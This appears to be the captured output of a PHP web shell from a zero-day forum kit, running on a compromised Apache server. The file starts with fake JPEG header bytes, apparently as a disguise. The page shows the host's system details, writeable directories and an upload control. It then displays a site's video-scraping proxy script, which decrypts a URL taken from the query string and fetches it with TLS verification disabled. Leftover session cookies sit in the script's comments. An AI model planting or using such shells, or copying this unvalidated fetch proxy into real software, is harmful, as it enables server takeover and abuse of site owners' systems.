����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/vidoe.top/proxy/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/vidoe.top/proxy/embed_pl.php
<?php
function str_encode($data,$pwd)
{
    $x = 0;
    $a = 0;
    $j = 0;
    $Zcrypt = '';
    $pwd_length = strlen($pwd);
    for ($i = 0; $i < 255; $i++) {
        $key[$i] = ord(substr($pwd, ($i % $pwd_length)+1, 1));
        $counter[$i] = $i;
    }
    for ($i = 0; $i < 255; $i++) {
        $x = ($x + $counter[$i] + $key[$i]) % 256;
        $temp_swap = $counter[$i];
        $counter[$i] = $counter[$x];
        $counter[$x] = $temp_swap;
    }
    for ($i = 0; $i < strlen($data); $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $counter[$a]) % 256;
        $temp = $counter[$a];
        $counter[$a] = $counter[$j];
        $counter[$j] = $temp;
        $k = $counter[(($counter[$a] + $counter[$j]) % 256)];
        $Zcipher = ord(substr($data, $i, 1)) ^ $k;
        $Zcrypt .= chr($Zcipher);
    }
    return $Zcrypt;
}
if(!function_exists (hex2bin)){
    function hex2bin($hexdata) {
        $bindata = '';
        for ($i=0;$i<strlen($hexdata);$i+=2) {
            $bindata .= chr(hexdec(substr($hexdata,$i,2)));
        }
        return $bindata;
    }
}
function get_content($url) {
    $header[] = "Host: phimvang.com";
    $header[] = "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0";
    $header[] = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
    $header[] = "Accept-Language: en-US,en;q=0.5";
    $header[] = "Accept-Encoding: gzip, deflate";
    //$header[] = "Referer: http://phimnhanh.com/phim/cuoc-chien-co-dau-bride-wars-2009";
//$header[] = "Cookie: __cfduid=d5035ca390c3deb26e85331206894e9061454162552; player-next=1; v_pos=12119-595_12124-36_12118-11_3662-32_12142-1357_12273-1524; _ga=GA1.2.1705245039.1454508599; XSRF-TOKEN=eyJpdiI6IlU2OVRwUExWd1ZhNnZUVnlcLzZYN1wvQT09IiwidmFsdWUiOiJCeU9CQ1V6MmxIeTQ0SlhRWmxBRkx5OGxQZ1U4eDQrTGY2aGoxVDB3amdzOGRSbVJHNUJEWGRyOVV6MVwvcWpsSUlvckQraTI2MlNuXC8yV0xVdDhBMFV3PT0iLCJtYWMiOiI5Y2FhMDYzNWY5NTBjNzkyZGI0ZmU5ZDdiOGQyNTdmZTZlNTRmNzZjZDJjNjBmNTc1NWU1MmUxZThkY2Y0MGE2In0%3D; laravel_session=eyJpdiI6InRPZzB3ZlJtNkFIOG5SNmlYeG9iWlE9PSIsInZhbHVlIjoiWlVcLzYrOXVnVkh4Z29nNERDcjNxZzhCdlg2Q2xYUzVweEp5ekJPVkp6WXpRYXpQZE1cLzVPTlpYNDZEcHdiaFNkZDhRXC9CS1lhYUEzcnpmRnh0aGhPY0E9PSIsIm1hYyI6ImE1NjVhYzJiN2NhYWU5YTllNDdkMGRkNzRlOTY4ZTRlNDc5MTYwMzM1YjEyNjk4NmVjMjBlODJjZjQzMDE5YTQifQ%3D%3D; PHPSESSID=dh0mlacefa737pu49derp7ndq0; _gat=1";
    $header[] = "Connection: keep-alive";
    $header[] = "Cache-Control: max-age=0";

    $process = curl_init();
    curl_setopt($process, CURLOPT_HTTPHEADER, $header);
    curl_setopt($process, CURLOPT_HEADER, 0);
    curl_setopt($process, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0');
    //curl_setopt($process, CURLOPT_COOKIEFILE, dirname(__FILE__).'/'.'cookies_anhtrang2.txt');
    //curl_setopt($process, CURLOPT_COOKIEJAR,  dirname(__FILE__).'/'.'cookies_anhtrang2.txt');
    curl_setopt($process, CURLOPT_REFERER, 'http://phimvang.com');
    curl_setopt($process, CURLOPT_ENCODING, 'gzip,deflate');
    curl_setopt($process,CURLOPT_ENCODING , compression);
    curl_setopt($process, CURLOPT_TIMEOUT, 10);
    //if (proxy) curl_setopt($cUrl, CURLOPT_PROXY, 'proxy_ip:proxy_port');
    curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt ($process, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt ($process, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($process, CURLOPT_SSLVERSION, 3);
    curl_setopt($process, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($process, CURLOPT_VERBOSE, 0);
    curl_setopt($process, CURLOPT_MAXREDIRS, 4);
    curl_setopt($process, CURLOPT_HTTPGET, TRUE);
    curl_setopt($process, CURLOPT_POST, FALSE);
    curl_setopt($process, CURLOPT_URL, $url);
    $return = curl_exec($process);
    //$header  = curl_getinfo($process);
    curl_close($process);
    return $return;
}
function get_content_phim47($url) {
    $header[] = "Host: play.phimvang.com:8080";
    $header[] = "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0";
    $header[] = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
    $header[] = "Accept-Language: en-US,en;q=0.5";
    $header[] = "Accept-Encoding: gzip, deflate";
    //$header[] = "Referer: http://phimnhanh.com/phim/cuoc-chien-co-dau-bride-wars-2009";
//$header[] = "Cookie: __cfduid=dce746ee20cc79ad2de75d754339e51111450604567; _ga=GA1.2.1998010658.1450981655; __gads=ID=604aa157ec9059a0:T=1450981659:S=ALNI_MZrm7DFTJe2AIHAOTrXTEwD3zRguA; _gat=1";
    $header[] = "Connection: keep-alive";
    //$header[] = 'If-None-Match: W/"70f-JS8y6yIvwgMFxY2zjCKtBA"';
    $header[] = "Cache-Control: max-age=0";

    $process = curl_init();
    curl_setopt($process, CURLOPT_HTTPHEADER, $header);
    curl_setopt($process, CURLOPT_HEADER, 0);
    curl_setopt($process, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0');
    //curl_setopt($process, CURLOPT_COOKIEFILE, dirname(__FILE__).'/'.'cookies_anhtrang2.txt');
    //curl_setopt($process, CURLOPT_COOKIEJAR,  dirname(__FILE__).'/'.'cookies_anhtrang2.txt');
    curl_setopt($process, CURLOPT_REFERER, 'http://phimvang.com');
    curl_setopt($process, CURLOPT_ENCODING, 'gzip,deflate');
    curl_setopt($process,CURLOPT_ENCODING , compression);
    curl_setopt($process, CURLOPT_TIMEOUT, 10);
    //if (proxy) curl_setopt($cUrl, CURLOPT_PROXY, 'proxy_ip:proxy_port');
    curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt ($process, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt ($process, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($process, CURLOPT_SSLVERSION, 3);
    curl_setopt($process, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($process, CURLOPT_VERBOSE, 0);
    curl_setopt($process, CURLOPT_MAXREDIRS, 4);
    curl_setopt($process, CURLOPT_HTTPGET, TRUE);
    curl_setopt($process, CURLOPT_POST, FALSE);
    curl_setopt($process, CURLOPT_PORT, 8080);
    curl_setopt($process, CURLOPT_URL, $url);
    $return = curl_exec($process);
    //$header  = curl_getinfo($process);
    curl_close($process);
    return $return;
}
$url = $_GET['url'];
$play =  str_encode(hex2bin($url),'ngocgiac');
$content =  get_content($play);
preg_match('#play_url\+\'(.*?)\'\,#is',$content,$match);

$url2 = 'http://play.phimvang.com:8080'.$match[1];

$content2 = get_content_phim47($url2);
echo $content2;
exit();
$arr_link= json_decode($content2,true);
?>
<html><head><title>-Server embed-</title>
    <style type="text/css">
        body {
            background: #000000;
            margin: 0px;
            padding: 0px;
        }
    </style>
</head>
<body style="width: 100%; height: 100%">
<div id="yt_player" style="width: 100%; height: 100%; text-align: center; margin: 0 auto;">
    <video width="100%" height="100%" controls="" autoplay="" preload="none" id="ht_player">
        <source data-res="<?php echo $arr_link[0]['height'];?>p" type="video/mp4" src="<?php echo $arr_link[0]['url'];?>">
    </video>
</div>
</body></html>

ZeroDay Forums Mini